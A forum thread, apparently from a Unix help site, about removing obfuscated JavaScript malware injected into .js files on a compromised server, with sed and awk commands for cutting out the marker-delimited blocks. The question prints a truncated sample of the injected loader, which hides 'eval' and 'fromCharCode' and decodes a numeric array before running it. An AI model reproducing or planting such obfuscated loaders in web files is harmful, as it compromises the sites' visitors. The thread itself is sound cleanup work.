Removing obfuscated javascript from js files

# 1  
Old 07-02-2012
Removing obfuscated javascript from js files

Hello, I am trying to remove obfuscated code from multiple files on a server; the malicious code is surrounded by

Code:
/*km0ae9gr6m*//*qhk6sa6g1c*/

I had success removing it from some files using this command

Code:
sed -i ':strt;s|/\*km0ae9gr6m\*/[^/]*/\*qhk6sa6g1c\*/||g;/\/\*km0ae9gr6m\*\//{N;b strt}' fileaffected.js

But it failed on this pattern

Code:
/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[312,420,100,200,303,440,34,118,96,40,32
...
more bytecode
...
,68,312,420,100,200,303,440,34,118,96,40,32,64,96,128,32,64,96,128,32,64,96,128,100,222,297,468,109,202,330,464,46,196,333,400,121,92,291,448,112,202,330,400,67,208,315,432,100,80,315,408,114,218,123,236,10,64,96,128,32,64,96,128,32,250,30,128,32,64,96,500,99,194,348,396,104,80,303,164,123,250,30,500,44,64,159,192,48,82,177];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}/*qhk6sa6g1c*/

Any suggestions?

Last edited by methyl; 07-02-2012 at 02:17 PM.. Reason: please use code tags
# 2  
Old 07-02-2012
This is not the answer you wanted, but have you considered restoring the files from backup?

You also probably need to run something like rootkit hunter on your system. Otherwise the clean code will be messed up again in no time. And did you patch or plug the hole the exploit used to attack your system?
# 3  
Old 07-02-2012
Welcome to the forums, cuantica:

Someone had a similar problem very recently. This post may be of use to you: https://www.unix.com/302662831-post17.html

Regards,
Alister
# 4  
Old 07-02-2012
Thanks Jim, backups are not an option. This issue happened due to an unpatched Plesk box, so I decided to move the sites to cPanel.

Regarding the thread suggested by Alister, I had checked it before posting, and decided to open a new thread because the person trying to fix this was considering 3 lines; in some files the infection uses only one line, and using that approach would modify the valid file contents. BTW this seems to be related to my box too, but posted by the person to whom we had delegated administration.

It is safer to remove them using the pattern; it worked fine, but I don't know how to escape the scripting at the beginning and end of the pattern to just consider
Code:
/*km0ae9gr6m*/malware/*qhk6sa6g1c*/

---------- Post updated at 11:31 AM ---------- Previous update was at 11:02 AM ----------

Any suggestions ?

Last edited by methyl; 07-02-2012 at 02:32 PM.. Reason: code tags ; correct typos in post
# 5  
Old 07-02-2012
I'm no sed expert, but have you tried something like this:

Code:
sed -n '/\/\*km0ae9gr6m\*\//,/\/\*qhk6sa6g1c\*\//!p' filename


This is essentially
Code:
sed -n '/start/,/end/!p'

i.e. output anything except the lines in the range (inclusive).

The proposed sed escapes every character in the search strings which is special to sed (i.e. / and *).

Tested on your sample data.

Last edited by methyl; 07-02-2012 at 03:49 PM.. Reason: typos
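Both sed approaches in this thread struggle with the same data: the `[^/]*` in the first loop stops at the `/` characters inside the payload, and the range form drops legitimate code that shares a line with the markers. The script below is an added example (not code from the thread); it treats the markers as literal strings with awk's index(), so neither the `/` and `*` in the markers nor any `/` inside the payload needs escaping, and it keeps the code on either side of a block. The sample file is constructed, with the payload shortened to a fragment of what the thread shows.

```shell
#!/bin/sh
# Added example (not from the thread): remove every block delimited by the two
# marker comments, whether it spans several lines or shares a line with real code.
# awk's index() matches the markers literally, so the "/" and "*" in the markers
# and the "/" characters inside the payload (which broke [^/]* in the sed loop)
# need no escaping at all.
START='/*km0ae9gr6m*/'
END='/*qhk6sa6g1c*/'

# strip_block FILE -> cleaned content on stdout (the file itself is not modified)
strip_block() {
  awk -v s="$START" -v e="$END" '
  {
    line = $0; out = ""; touched = inblk   # touched: this line holds payload
    while (1) {
      if (!inblk) {
        p = index(line, s)
        if (p == 0) { out = out line; break }     # no marker: keep the rest
        out = out substr(line, 1, p - 1)          # keep code before the marker
        line = substr(line, p + length(s)); inblk = 1; touched = 1
      } else {
        p = index(line, e)
        if (p == 0) break                         # rest of line is payload
        line = substr(line, p + length(e)); inblk = 0; touched = 1
      }
    }
    # untouched lines pass through; lines that were entirely payload are dropped
    if (!touched || out != "") print out
  }' "$1"
}

# Constructed sample: a one-line infection next to real code, then a multi-line one.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
var keep1 = 1;/*km0ae9gr6m*/try{h=-012/5;}catch(qw){}/*qhk6sa6g1c*/var keep2 = 2;
/*km0ae9gr6m*/try{
e=window["e"+"val"];n=[312,420];
}/*qhk6sa6g1c*/
function legit(){ return 3; }
EOF

strip_block "$SAMPLE"
# prints:
# var keep1 = 1;var keep2 = 2;
# function legit(){ return 3; }
```

To clean a whole tree, list the affected files with `grep -l 'km0ae9gr6m'`, run `strip_block` on each into a temporary file, diff it against the original, and only then move it into place.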